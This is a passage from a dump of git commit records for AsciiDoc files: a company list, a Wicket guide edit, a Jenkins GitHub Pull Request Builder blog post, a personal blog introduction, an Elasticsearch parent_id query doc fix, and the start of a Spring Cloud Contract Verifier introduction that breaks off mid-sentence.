Nukomeet\n* Numerical Brass Computing\n* Obrizum Group Ltd.\n* Oche Dart\n* Oiiku\n* OkLetsPlay\n* Omnyway Inc\n* Ona\n* Onfido\n* OnlineCasinoInformatie\n* OnTheMarket\n* OpenCompany\n* OpenSensors.io\n* OpenTable\n* Oracle\n* OrgSync\n* Orkli\n* Oscaro\n* Otto\n* OurHub\n* Outpace\n* Outpost Games\n* Owsy\n* Oyster Lab by Alpiq\n* PaddleGuru\n* Panacea Systems\n* Pandora\n* paper.li\n* ParcelBright\n* PartsBox\n* PassivSystems\n* Path\n* PayGarden\n* PayGo\n* Payoff\n* PennyMac\n* Pilloxa\n* Pisano\n* Pitch\n* Pivotal Labs\n* PKC\n* Point Slope\n* Pol.is\n* Postmark\n* PractiTest\n* Precursor\n* Premium Business Consultants BV\n* Prime.vc\n* Print.IO\n* projectmaterials.com\n* Projexsys\n* ProtoPie\n* Publizr\n* Puppet Labs\n* PurposeFly\n* Quartet Health\n* Quintype\n* Qvantel\n* Radiant Labs\n* RADIOactive\n* Reaktor\n* Red Hat\n* Red Pineapple Media\n* Reify Health\n* RentPath\n* Ride Health\n* Rio de Janeiro Botanical Garden\n* RJMetrics\n* R\u014dmr\n* Roam Research\n* Rocket Fuel\n* ROKT\n* Room Key\n* Roomstorm\n* Rowdy Labs\n* ROXIMITY\n* RTS\n* Salesforce\n* Sallie Mae\n* SAP\n* SAP Concur\n* Sapiens Sapiens\n* Schibsted\n* SEB (Skandinaviska Enskilda Banken)\n* Shareablee\n* Sharetribe\n* shore.li\n* Signafire\n* Signal\n* Siili Solutions\n* Silicon Valley Bank\n* Silverline Mobile\n* Silverpond\n* Simple\n* Simply\n* Sinapsi\n* SIOS Technology Corp.\n* SixSq\n* Skipp\n* Smilebooth\n* SMX\n* Social Superstore\n* Solita\n* Soundcloud\n* SoYouLearn\n* SparkFund\n* Spatial Informatics Group\n* Spinney\n* Splash Financial\n* Spotify\n* SquareVenue\n* Staples Exchange\n* Staples Sparx\n* Starcity\n* Stardog\n* Status\n* Status Research & Development GmbH\n* Stitch\n* StreetLinx (acquired by Symphony)\n* Structured 
Dynamics\n* Studio71\n* Studyflow\n* Stylitics\n* Suiteness\n* Suprematic\n* SwiftKey (Microsoft)\n* Swirrl\n* Swym\n* Synple\n* Synqrinus\n* Taiste\n* Takeoff Technologies\n* TalentAds\n* Tapp Commerce\n* TCGplayer\n* TechnoIdentity\n* Teradata\n* Test Double\n* The Climate Corporation\n* ThinkTopic\n* Thinstripe\n* ThoughtWorks\n* ThreatGRID (acquired by Cisco)\n* TODAQ Financial\n* TokenMill\n* Tool2Match\n* TopMonks\n* TouK\n* TOYOKUMO\n* Trainline\n* T-Rank\n* Treasury Prime\n* TriOptima\n* Troy-West\n* Trucker Path\n* Two Sigma\n* Udviklings- og forenklingsstyrelsen\n* Unacast\n* Unbounce\n* Unfold\n* University Health Network\n* University Leipzig - Research Centre for Civilization Diseases (LIFE)\n* UpLift\n* Upworthy\n* Urban Dictionary\n* Ustream\n* uSwitch\n* VakantieDiscounter\n* Veltio\n* Very\n* VeryBigThings\n* Vetd\n* Verrency\n* Viasat\n* Vigiglobe\n* Vilect\n* Vire\n* Virool\n* Vital Labs\n* Vodori\n* Walmart Labs\n* Weave\n* WeFarm\n* WeShop\n* Whibse\n* Whimsical\n* Whitepages\n* Wikidocs (acquired by Atlassian)\n* Wildbit\n* Wit.ai (acquired by Facebook)\n* Work & Co\n* work.co\n* Workframe\n* Workinvoice\n* WorksHub\n* World Singles Networks\n* Xapix GmbH\n* Xcoo Inc.\n* XN Logic\n* Yeller\n* Yet Analytics\n* Yieldbot\n* Yousee IT Innovation Labs\n* YouView\n* Yummly\n* Yuppiechef\n* Zalando\n* Zendesk\n* Zen Finance\n* Zoona\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"066a44c83ae682a8b8c7b202eeda968cdc424178","subject":"Removed staruml as it's not used","message":"Removed staruml as it's not used\n","repos":"mosoft521\/wicket,apache\/wicket,apache\/wicket,mosoft521\/wicket,apache\/wicket,apache\/wicket,apache\/wicket,mosoft521\/wicket,mosoft521\/wicket,mosoft521\/wicket","old_file":"wicket-user-guide\/src\/main\/asciidoc\/helloWorld.adoc","new_file":"wicket-user-guide\/src\/main\/asciidoc\/helloWorld.adoc","new_contents":"\nWicket allows us to design our web pages in terms of components and containers, just like AWT does with desktop windows. \nBoth frameworks share the same component-based architecture: in AWT we have a _Window_ instance which represents the physical window containing GUI components (like text fields, radio buttons, drawing areas, etc...), in Wicket we have a _WebPage_ instance which represents the physical web page containing HTML components (pictures, buttons, forms, etc...).\n\nimage::..\/img\/uml-component.png[]\n\nIn both frameworks we find a base class for GUI components called _Component_. Wicket pages can be composed (and usually are) of many components, just like AWT windows are composed of Swing\/AWT components. Both frameworks promote the reuse of presentation code and GUI elements by building custom components. Even if Wicket already comes with a rich set of ready-to-use components, building custom components is a common practice when working with this framework. We'll learn more about custom components in the next chapters.\n\n","old_contents":"\nWicket allows us to design our web pages in terms of components and containers, just like AWT does with desktop windows. \nBoth frameworks share the same component-based architecture: in AWT we have a _Window_ instance which represents the physical window containing GUI components (like text fields, radio buttons, drawing areas, etc...), in Wicket we have a _WebPage_ instance which represents the physical web page containing HTML components (pictures, buttons, forms, etc...
) .\n\nimage::..\/img\/uml-component.png[]\n\n....\n@startuml\npackage java.awt {\n\tclass Component\n\tclass Window extends Component\n\t\n\tWindow \"*\" *-- \"1\" Component\n}\n\npackage org.apache.wicket {\n\tclass org.apache.wicket.Component\n\tclass WebPage extends org.apache.wicket.Component\n\t\n\tWebPage \"*\" *-- \"1\" org.apache.wicket.Component\n}\n@enduml\n....\n\nIn both frameworks we find a base class for GUI components called _Component_. Wicket pages can be composed (and usually are) by many components, just like AWT windows are composed by Swing\/AWT components. Both frameworks promote the reuse of presentation code and GUI elements building custom components. Even if Wicket already comes with a rich set of ready-to-use components, building custom components is a common practice when working with this framework. We'll learn more about custom components in the next chapters.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b02c225396ce7aceaaca31ef9b13ac836db98812","subject":"Update 2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","message":"Update 2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","repos":"yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io,yaks-all-the-way-down\/hubpress.github.io","old_file":"_posts\/2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","new_file":"_posts\/2016-04-22-Presenting-Git-Hub-Pull-Request-Builder.adoc","new_contents":"= Presenting: GitHub Pull Request Builder\n\n:hp-image: \/hubpress.github.io\/images\/github-status.png\n:published_at: 2016-04-22\n\nGitHub's existing PR (Pull Request) feature makes it easy to see what changed between branches,\nbut it doesn't always give you the full picture. If you have any kind of automated testing and \ncurrently use Jenkins, the following plugin can give you a full picture of the impact when you're ready to\nmerge a request.\n\nThe https:\/\/wiki.jenkins-ci.org\/display\/JENKINS\/GitHub+pull+request+builder+plugin[GitHub Pull Request Builder] plugin\nis an easy way to plug your own Jenkins jobs into a pull request. High level features:\n\n- Can run any job you can set up in Jenkins\n- Simple whitelist permissions for running PR jobs\n- Trigger phrases for running specific jobs\n- Test results are published into PR status on GitHub\n- Retry jobs with a phrase, in case of a setup issue with a job\n\n#### Installation\nThere are no special instructions for installing the plugin - do as you normally would.\n\n#### Configuring a sample job\n\nimage:github-pull-request-builder-sample-job1.png[SCM]\n\nNOTE: You will need to configure the *Source Code Management* section of your job specifically for the plugin. \nNote in the image above, the *Name*, *Refspec*, and *Branch Specifier* sections - these ensure the plugin can view changes in PR's\nand the job runs against the correct commit hash. You will need to click the *Advanced* button to view some of the above fields.\n\n\nimage:github-pull-request-builder-sample-job2.png[Build Triggers]\n\nNOTE: You will need to select the *Advanced* and *Trigger Setup* buttons to view all of the fields shown above. 
Here's an explanation\nof the available options:\n\n- anchor:Admin-List[]Admin list: If you would like to approve running a job against a PR, then list here the github users that can approve running the job.\nOur team is small enough that everyone is automatically approved (see the link:#Organization[Organization] section).\n- anchor:GitHub-Hook[]Use GitHub hooks: You may either set the job to poll for new PR's to run against (see the link:#Crontab[Crontab] section),\nor if you check this box, and have GitHub hooks set up, Jenkins will be told when a new PR has been created.\n- anchor:Trigger-Phrase[]Trigger phrase: You can specify a trigger phrase (with regex) to run the job. This can be used to re-run\na job without making changes to the PR, in case of an environmental build failure for example.\n- anchor:Only-Use-Trigger-Phrase[]Only use trigger phrase: Selecting this box will suppress running the job on a PR until the\ntrigger phrase is found in a PR description or comment.\n- anchor:Close-Failed[]Close failed pull request automatically: I've never used this option, but my guess is the name is \nself-explanatory.\n- anchor:Skip-Build-Phrase[]Skip build phrase: You can specify a phrase (with regex) that, if mentioned in the PR description,\nwill suppress running this job. <br\/>**As of May 2016, this feature is broken, and can only be set in the global plugin settings**.\n- anchor:Display-Build-Errors[]Display build errors on downstream builds: I could not find any documentation on this feature, and \nlooking at the code indicates that nothing is using it, so use at your own peril.\n- anchor:Crontab[]Crontab: If you are not using GitHub webhooks, then you will need to set a schedule of when the job should\nlook for PR's to run against. In the sample job image, we're checking every 2 minutes.\n- anchor:Whitelist[]Whitelist: If you choose not to whitelist entire organizations (see the link:#Organization[Organization] section), \nyou have the option to whitelist teams or users. Those who are whitelisted will not require approval to run the job against their PR.\n\nimage:github-pull-request-builder-sample-job3.png[Build Triggers Contd]\n\n- anchor:Organization[]Whitelist Organizations: Check this if you want everyone in the listed organizations\nto be automatically approved, which will trigger the job when the PR is opened.\n- anchor:Allow-Whitelist-Admins[]Allow whitelisted members of organizations as admins: Selecting this box will allow the above\nwhitelisted organizations to act as admins, without naming them individually in the link:#Admin-List[Admin List].\n- anchor:Build-Every-Pull-Request[]Build every pull request automatically without asking: Selecting this box will skip checking the PR\nfor trigger, skip or build phrases, or permissions, and just run the job every time. **Risky**.\n- anchor:Build-Description[]Build description template: The default Jenkins job description will use the PR number and PR title.\nIf you would like to change it, you can here.\n- anchor:Whitelist-Branches[]Whitelist target branches: By adding a branch (or branches) here, it will restrict the job to only\nPR's merging into those branches.\n- anchor:Trigger-Setup[]Trigger setup: At a minimum, I recommend changing the *Commit Status Context* to be specific to this job. 
\nIf you have multiple job running on each PR, you will see this name displayed in the list of checks on the PR.\n\n#### Impact on your PR\nOnce you have a few jobs configured to check your PR's, and you have run some of them, you will see something like this image\nbelow on your PR:\n\nimage:github-pull-request-builder-sample-job4.png[Build Triggers Contd]\n\nNow you have a better understanding of the impact of your PR, and can keep breaking updates out of your parent branches until you're ready!","old_contents":"= Presenting: GitHub Pull Request Builder\n\n:hp-image: images\/github-status.png\n:published_at: 2016-04-22\n\nGitHub's existing PR (Pull Request) feature makes it easy to see what changed between branches,\nbut it doesn't always give you the full picture. If you have any kind of automated testing and \ncurrently use Jenkins, the following plugin can give you a full picture of the impact when you're ready to\nmerge a request.\n\nThe https:\/\/wiki.jenkins-ci.org\/display\/JENKINS\/GitHub+pull+request+builder+plugin[GitHub Pull Request Builder] plugin\nis an easy way to plug your own Jenkins jobs into a pull request. High level features:\n\n- Can run any job you can set up in Jenkins\n- Simple whitelist permissions for running PR jobs\n- Trigger phrases for running specific jobs\n- Test results are published into PR status on GitHub\n- Retry jobs with a phrase, in case of a setup issue with a job\n\n#### Installation\nThere are no special instructions for installing the plugin - do as you normally would.\n\n#### Configuring a sample job\n\nimage:github-pull-request-builder-sample-job1.png[SCM]\n\nNOTE: You will need to configure the *Source Code Management* section of your job specifically for the plugin. \nNote in the image above, the *Name*, *Refspec*, and *Branch Specifier* sections - these ensure the plugin can view changes in PR's\nand the job runs against the correct commit hash. You will need to click the *Advanced* button to view some of the above fields.\n\n\nimage:github-pull-request-builder-sample-job2.png[Build Triggers]\n\nNOTE: You will need to select the *Advanced* and *Trigger Setup* buttons to view all of the fields shown above. Here's an explanation\nof the available options:\n\n- anchor:Admin-List[]Admin list: If you would like to approve running a job against a PR, then list here the github users that can approve running the job.\nOur team is small enough that everyone is automatically approved (see the link:#Organization[Organization] section).\n- anchor:GitHub-Hook[]Use GitHub hooks: You may either set the job to poll for new PR's to run against (see the link:#Crontab[Crontab] section),\nor if you check this box, and have GitHub hooks set up, Jenkins will be told when a new PR has been created.\n- anchor:Trigger-Phrase[]Trigger phrase: You can specify a trigger phrase (with regex) to run the job. This can be used to re-run\na job without making changes to the PR, in case of an environmental build failure for example.\n- anchor:Only-Use-Trigger-Phrase[]Only use trigger phrase: Selecting this box will suppress running the job on a PR until the\ntrigger phrase is found in a PR description or comment.\n- anchor:Close-Failed[]Close failed pull request automatically: I've never used this option, but my guess is the name is \nself-explanatory.\n- anchor:Skip-Build-Phrase[]Skip build phrase: You can specify a phrase (with regex) that, if mentioned in the PR description,\nwill suppress running this job. 
<br\/>**As of May 2016, this feature is broken, and can only be set in the global plugin settings**.\n- anchor:Display-Build-Errors[]Display build errors on downstream builds: I could not find any documentation on this feature, and \nlooking at the code indicates that nothing is using it, so use at your own peril.\n- anchor:Crontab[]Crontab: If you are not using GitHub webhooks, then you will need to set a schedule of when the job should\nlook for PR's to run against. In the sample job image, we're checking every 2 minutes.\n- anchor:Whitelist[]Whitelist: If you choose not to whitelist entire organizations (see the link:#Organization[Organization] section), \nyou have the option to whitelist teams or users. Those who are whitelisted will not require approval to run the job against their PR.\n\nimage:github-pull-request-builder-sample-job3.png[Build Triggers Contd]\n\n- anchor:Organization[]Whitelist Organizations: Check this if you want everyone in the listed organizations\nto be automatically approved, which will trigger the job when the PR is opened.\n- anchor:Allow-Whitelist-Admins[]Allow whitelisted members of organizations as admins: Selecting this box will allow the above\nwhitelisted organizations to act as admins, without naming them individually in the link:#Admin-List[Admin List].\n- anchor:Build-Every-Pull-Request[]Build every pull request automatically without asking: Selecting this box will skip checking the PR\nfor trigger, skip or build phrases, or permissions, and just run the job every time. **Risky**.\n- anchor:Build-Description[]Build description template: The default Jenkins job description will use the PR number and PR title.\nIf you would like to change it, you can here.\n- anchor:Whitelist-Branches[]Whitelist target branches: By adding a branch (or branches) here, it will restrict the job to only\nPR's merging into those branches.\n- anchor:Trigger-Setup[]Trigger setup: At a minimum, I recommend changing the *Commit Status Context* to be specific to this job. \nIf you have multiple job running on each PR, you will see this name displayed in the list of checks on the PR.\n\n#### Impact on your PR\nOnce you have a few jobs configured to check your PR's, and you have run some of them, you will see something like this image\nbelow on your PR:\n\nimage:github-pull-request-builder-sample-job4.png[Build Triggers Contd]\n\nNow you have a better understanding of the impact of your PR, and can keep breaking updates out of your parent branches until you're ready!","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"aaad1d4a43c0d8acad07505e9bb3e18a882ad2ea","subject":"Update 2017-01-17-First-Post.adoc","message":"Update 2017-01-17-First-Post.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2017-01-17-First-Post.adoc","new_file":"_posts\/2017-01-17-First-Post.adoc","new_contents":"= First Post\n:hp-image: \/images\/covers\/winterwonderland.jpg\n:hp-tags: Introduction, Personal\n\nimage::christmasprofile.JPG[Christmas Profile,400,300] \n\nHi, welcome! I am a 24 year old guy living in Toronto. I am interested in a lot of things like technology, the interconnectedness of things, the human brain, music, books and esoteric adventures.\n\nI wished to chronicle my growth as a person as well as leave a record for psychologists to examine in case...well, just in case. I also feel obligated to put my glorious adjustment to anti epilpetic drugs over the past year as a reason for this journaling activity. 
(Been taking an epileptic drug called Tegretol since I was 10 -> Slowed my brain down for a few years coincinding with my years in university -> Now I m back and with a rejuvinated spirit for learning and fighting the power, which is still my brain lol)\n\nThat's a good segue to tell everyone about my current employment situtation. I spent the last 6 months working for a startup that builds tools for epileptics. I was developing seizure detection algorithms for them, but for various reasons I quit a couple of weeks ago. I still think they ll be a successful company because their mission is pretty complimentary to the needs of 1 in 26 people in this world (Check them out : http:\/\/www.neutun.com\/). I worked on their seizure detection algorithms and testing. Here's what i did : https:\/\/www.youtube.com\/watch?v=Es_uIpyG4FE . Anyway, I have been interviewing to join a few cool projects in machine learning, which is a field that has caught me right in its gaze of unfiltered possibilities. I had an interview with Qualcomm last Friday which went pretty alright and I'm hopeful.\n\nSo yes, that's where I am - partially glad to be spending this Canadian winter in the comforts of my room and working on personal projects including a rigorous quest to achieve physical optimization.\n\nI have a few blog posts coming up - a book review and about the Gross National Happiness idea in Bhutan. So I hope wanderers and friends will come back and read my thoughts on those.\n\nSoon.\n\nAnshuman +\nToronto +\n17 Jan 2017\n\n","old_contents":"= First Post\n:hp-image: \/covers\/winterwonderland.jpg\n:hp-tags: Introduction, Personal\n\nimage::christmasprofile.JPG[Christmas Profile,400,300] \n\nHi, welcome! I am a 24 year old guy living in Toronto. I am interested in a lot of things like technology, the interconnectedness of things, the human brain, music, books and esoteric adventures.\n\nI wished to chronicle my growth as a person as well as leave a record for psychologists to examine in case...well, just in case. I also feel obligated to put my glorious adjustment to anti epilpetic drugs over the past year as a reason for this journaling activity. (Been taking an epileptic drug called Tegretol since I was 10 -> Slowed my brain down for a few years coincinding with my years in university -> Now I m back and with a rejuvinated spirit for learning and fighting the power, which is still my brain lol)\n\nThat's a good segue to tell everyone about my current employment situtation. I spent the last 6 months working for a startup that builds tools for epileptics. I was developing seizure detection algorithms for them, but for various reasons I quit a couple of weeks ago. I still think they ll be a successful company because their mission is pretty complimentary to the needs of 1 in 26 people in this world (Check them out : http:\/\/www.neutun.com\/). I worked on their seizure detection algorithms and testing. Here's what i did : https:\/\/www.youtube.com\/watch?v=Es_uIpyG4FE . Anyway, I have been interviewing to join a few cool projects in machine learning, which is a field that has caught me right in its gaze of unfiltered possibilities. 
I had an interview with Qualcomm last Friday which went pretty alright and I'm hopeful.\n\nSo yes, that's where I am - partially glad to be spending this Canadian winter in the comforts of my room and working on personal projects including a rigorous quest to achieve physical optimization.\n\nI have a few blog posts coming up - a book review and about the Gross National Happiness idea in Bhutan. So I hope wanderers and friends will come back and read my thoughts on those.\n\nSoon.\n\nAnshuman +\nToronto +\n17 Jan 2017\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d2a6c1627fab6743922c115b7c62564a2998b469","subject":"[DOCS] Fix typo in parent-child example request (#76646)","message":"[DOCS] Fix typo in parent-child example request (#76646)\n\n","repos":"GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/query-dsl\/parent-id-query.asciidoc","new_file":"docs\/reference\/query-dsl\/parent-id-query.asciidoc","new_contents":"[[query-dsl-parent-id-query]]\n=== Parent ID query\n++++\n<titleabbrev>Parent ID<\/titleabbrev>\n++++\n\nReturns child documents <<parent-join,joined>> to a specific parent document.\nYou can use a <<parent-join,join>> field mapping to create parent-child\nrelationships between documents in the same index.\n\n[[parent-id-query-ex-request]]\n==== Example request\n\n[[parent-id-index-setup]]\n===== Index setup\nTo use the `parent_id` query, your index must include a <<parent-join,join>>\nfield mapping. To see how you can set up an index for the `parent_id` query, try\nthe following example.\n\n. Create an index with a <<parent-join,join>> field mapping.\n+\n--\n[source,console]\n----\nPUT \/my-index-000001\n{\n \"mappings\": {\n \"properties\": {\n \"my-join-field\": {\n \"type\": \"join\",\n \"relations\": {\n \"my-parent\": \"my-child\"\n }\n }\n }\n }\n}\n\n----\n\/\/ TESTSETUP\n--\n\n. Index a parent document with an ID of `1`.\n+\n--\n[source,console]\n----\nPUT \/my-index-000001\/_doc\/1?refresh\n{\n \"text\": \"This is a parent document.\",\n \"my-join-field\": \"my-parent\"\n}\n----\n--\n\n. Index a child document of the parent document.\n+\n--\n[source,console]\n----\nPUT \/my-index-000001\/_doc\/2?routing=1&refresh\n{\n \"text\": \"This is a child document.\",\n \"my-join-field\": {\n \"name\": \"my-child\",\n \"parent\": \"1\"\n }\n}\n----\n--\n\n[[parent-id-query-ex-query]]\n===== Example query\n\nThe following search returns child documents for a parent document with an ID of\n`1`.\n\n[source,console]\n----\nGET \/my-index-000001\/_search\n{\n \"query\": {\n \"parent_id\": {\n \"type\": \"my-child\",\n \"id\": \"1\"\n }\n }\n}\n----\n\n[[parent-id-top-level-params]]\n==== Top-level parameters for `parent_id`\n\n`type`::\n(Required, string) Name of the child relationship mapped for the\n<<parent-join,join>> field.\n\n`id`::\n(Required, string) ID of the parent document. The query will return child\ndocuments of this parent document.\n\n`ignore_unmapped`::\n+\n--\n(Optional, Boolean) Indicates whether to ignore an unmapped `type` and not\nreturn any documents instead of an error. 
Defaults to `false`.\n\nIf `false`, {es} returns an error if the `type` is unmapped.\n\nYou can use this parameter to query multiple indices that may not contain the\n`type`.\n--\n","old_contents":"[[query-dsl-parent-id-query]]\n=== Parent ID query\n++++\n<titleabbrev>Parent ID<\/titleabbrev>\n++++\n\nReturns child documents <<parent-join,joined>> to a specific parent document.\nYou can use a <<parent-join,join>> field mapping to create parent-child\nrelationships between documents in the same index.\n\n[[parent-id-query-ex-request]]\n==== Example request\n\n[[parent-id-index-setup]]\n===== Index setup\nTo use the `parent_id` query, your index must include a <<parent-join,join>>\nfield mapping. To see how you can set up an index for the `parent_id` query, try\nthe following example.\n\n. Create an index with a <<parent-join,join>> field mapping.\n+\n--\n[source,console]\n----\nPUT \/my-index-000001\n{\n \"mappings\": {\n \"properties\": {\n \"my-join-field\": {\n \"type\": \"join\",\n \"relations\": {\n \"my-parent\": \"my-child\"\n }\n }\n }\n }\n}\n\n----\n\/\/ TESTSETUP\n--\n\n. Index a parent document with an ID of `1`.\n+\n--\n[source,console]\n----\nPUT \/my-index-000001\/_doc\/1?refresh\n{\n \"text\": \"This is a parent document.\",\n \"my-join-field\": \"my-parent\"\n}\n----\n--\n\n. Index a child document of the parent document.\n+\n--\n[source,console]\n----\nPUT \/my-index-000001\/_doc\/2?routing=1&refresh\n{\n \"text\": \"This is a child document.\",\n \"my_join_field\": {\n \"name\": \"my-child\",\n \"parent\": \"1\"\n }\n}\n----\n--\n\n[[parent-id-query-ex-query]]\n===== Example query\n\nThe following search returns child documents for a parent document with an ID of\n`1`.\n\n[source,console]\n----\nGET \/my-index-000001\/_search\n{\n \"query\": {\n \"parent_id\": {\n \"type\": \"my-child\",\n \"id\": \"1\"\n }\n }\n}\n----\n\n[[parent-id-top-level-params]]\n==== Top-level parameters for `parent_id`\n\n`type`::\n(Required, string) Name of the child relationship mapped for the\n<<parent-join,join>> field.\n\n`id`::\n(Required, string) ID of the parent document. The query will return child\ndocuments of this parent document.\n\n`ignore_unmapped`::\n+\n--\n(Optional, Boolean) Indicates whether to ignore an unmapped `type` and not\nreturn any documents instead of an error. Defaults to `false`.\n\nIf `false`, {es} returns an error if the `type` is unmapped.\n\nYou can use this parameter to query multiple indices that may not contain the\n`type`.\n--\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"399be7599cd0f123f1206b49c73e9cd60357846d","subject":" Editing pass for new content (#570)","message":" Editing pass for new content (#570)\n\nOlga Maciaszek-Sharma added very nice content, in the form of a three-second and a three-minute introduction for the verifier. I edited her additions to conform to our usual standards and corporate voice.","repos":"spring-cloud\/spring-cloud-contract,spring-cloud\/spring-cloud-contract,spring-cloud\/spring-cloud-contract","old_file":"docs\/src\/main\/asciidoc\/verifier_introduction.adoc","new_file":"docs\/src\/main\/asciidoc\/verifier_introduction.adoc","new_contents":"== Spring Cloud Contract Verifier Introduction\n\nTIP: The Accurest project was initially started by Marcin Grzejszczak and Jakub Kubrynski\n(http:\/\/codearte.io[codearte.io])\n\nSpring Cloud Contract Verifier enables Consumer Driven Contract (CDC) development of\nJVM-based applications. 
It moves TDD to the level of software architecture.\n\nSpring Cloud Contract Verifier ships with _Contract Definition Language_ (CDL). Contract\ndefinitions are used to produce the following resources:\n\n* JSON stub definitions to be used by WireMock when doing integration testing on the\nclient code (_client tests_). Test code must still be written by hand, and test data is\nproduced by Spring Cloud Contract Verifier.\n* Messaging routes, if you're using a messaging service. We integrate with Spring\nIntegration, Spring Cloud Stream, Spring AMQP, and Apache Camel. You can also set your\nown integrations.\n* Acceptance tests (in JUnit or Spock) are used to verify if server-side implementation\nof the API is compliant with the contract (__server tests__). A full test is generated by\nSpring Cloud Contract Verifier.\n\n=== Why a Contract Verifier?\n\nAssume that we have a system consisting of multiple microservices:\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/docs\/src\/main\/asciidoc\/images\/Deps.png[Microservices Architecture]\n\n==== Testing issues\n\nIf we wanted to test the application in top left corner to determine whether it can\ncommunicate with other services, we could do one of two things:\n\n- Deploy all microservices and perform end-to-end tests.\n- Mock other microservices in unit\/integration tests.\n\nBoth have their advantages but also a lot of disadvantages.\n\n*Deploy all microservices and perform end to end tests*\n\nAdvantages:\n\n- Simulates production.\n- Tests real communication between services.\n\nDisadvantages:\n\n- To test one microservice, we have to deploy 6 microservices, a couple of databases,\netc.\n- The environment where the tests run is locked for a single suite of tests (nobody else\nwould be able to run the tests in the meantime).\n- They take a long time to run.\n- The feedback comes very late in the process.\n- They are extremely hard to debug.\n\n*Mock other microservices in unit\/integration tests*\n\nAdvantages:\n\n- They provide very fast feedback.\n- They have no infrastructure requirements.\n\nDisadvantages:\n\n- The implementor of the service creates stubs that might have nothing to do with\nreality.\n- You can go to production with passing tests and failing production.\n\nTo solve the aforementioned issues, Spring Cloud Contract Verifier with Stub Runner was\ncreated. The main idea is to give you very fast feedback, without the need to set up the\nwhole world of microservices. If you work on stubs, then the only applications you need\nare those that your application directly uses.\n\nimage::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-contract\/{branch}\/docs\/src\/main\/asciidoc\/images\/Stubs2.png[Stubbed Services]\n\nSpring Cloud Contract Verifier gives you the certainty that the stubs that you use were\ncreated by the service that you're calling. Also, if you can use them, it means that they\nwere tested against the producer's side. 
In short, you can trust those stubs.\n\n=== Purposes\n\nThe main purposes of Spring Cloud Contract Verifier with Stub Runner are:\n\n- To ensure that WireMock\/Messaging stubs (used when developing the client) do exactly\nwhat the actual server-side implementation does.\n- To promote ATDD method and Microservices architectural style.\n- To provide a way to publish changes in contracts that are immediately visible on both\nsides.\n- To generate boilerplate test code to be used on the server side.\n\nIMPORTANT: Spring Cloud Contract Verifier's purpose is NOT to start writing business\nfeatures in the contracts. Assume that we have a business use case of fraud check. If a\nuser can be a fraud for 100 different reasons, we would assume that you would create 2\ncontracts, one for the positive case and one for the negative case. Contract tests are\nused to test contracts between applications and not to simulate full behavior.\n\n=== How It Works\n\nThis section explores how Spring Cloud Contract Verifier with Stub Runner works.\n\n[[spring-cloud-contract-verifier-intro-three-second-tour]]\n==== A Three-second Tour\n\nThis very brief tour walks through using Spring Cloud Contract:\n\n* <<spring-cloud-contract-verifier-intro-three-second-tour-producer>>\n* <<spring-cloud-contract-verifier-intro-three-second-tour-consumer>>\n\nYou can find a somewhat longer tour\n<<spring-cloud-contract-verifier-intro-three-minute-tour,here>>.\n\n[[spring-cloud-contract-verifier-intro-three-second-tour-producer]]\n===== On the Producer Side\n\nTo start working with Spring Cloud Contract, add files with `REST\/` messaging contracts\nexpressed in either Groovy DSL or YAML to the contracts directory, which is set by the\n`contractsDslDir` property. By default, it is `$rootDir\/src\/test\/resources\/contracts`.\n\nThen add the Spring Cloud Contract Verifier dependency and plugin to your build file, as\nshown in the following example:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-server\/pom.xml[tags=verifier_test_dependencies,indent=0]\n----\n\nThe following listing shows how to add the plugin, which should go in the build\/plugins\nportion of the file:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.springframework.cloud<\/groupId>\n\t<artifactId>spring-cloud-contract-maven-plugin<\/artifactId>\n\t<version>${spring-cloud-contract.version}<\/version>\n\t<extensions>true<\/extensions>\n<\/plugin>\n----\n\nRunning `.\/mvnw clean install` automatically generates tests that verify the application\ncompliance with the added contracts. By default, the tests get generated under\n`org.springframework.cloud.contract.verifier.tests.`.\n\nAs the implementation of the functionalities described by the contracts is not yet\npresent, the tests fail.\n\nTo make them pass, you must add the correct implementation of either handling HTTP\nrequests or messages. Also, you must add a correct base test class for auto-generated\ntests to the project. 
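\n\nA minimal base class for HTTP contracts might look like the following sketch (the class and controller names are placeholders for illustration, and depending on your Rest Assured version the import may start with com.jayway.restassured instead of io.restassured):\n\n[source,java,indent=0]\n----\npackage com.example;\n\nimport io.restassured.module.mockmvc.RestAssuredMockMvc;\nimport org.junit.Before;\n\npublic abstract class ContractVerifierBase {\n\n\t\/\/ registers the controller under test before each generated test runs\n\t@Before\n\tpublic void setup() {\n\t\tRestAssuredMockMvc.standaloneSetup(new FraudDetectionController());\n\t}\n}\n----\n\n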
This class is extended by all the auto-generated tests, and it\nshould contain all the setup necessary to run them (for example `RestAssuredMockMvc`\ncontroller setup or messaging test setup).\n\nOnce the implementation and the test base class are in place, the tests pass, and both the\napplication and the stub artifacts are built and installed in the local Maven repository.\nThe changes can now be merged, and both the application and the stub artifacts may be\npublished in an online repository.\n\n[[spring-cloud-contract-verifier-intro-three-second-tour-consumer]]\n===== On the Consumer Side\n\n`Spring Cloud Contract Stub Runner` can be used in the integration tests to get a running\nWireMock instance or messaging route that simulates the actual service.\n\nTo do so, add the dependency to `Spring Cloud Contract Stub Runner`, as shown in the\nfollowing example:\n\n[source,xml,indent=0]\n----\ninclude::{introduction_url}\/samples\/standalone\/dsl\/http-client\/pom.xml[tags=stub_runner,indent=0]\n----\n\nYou can get the Producer-side stubs installed in your Maven repository in either of two\nways:\n\n* By checking out the Producer side repository and adding contracts and generating the 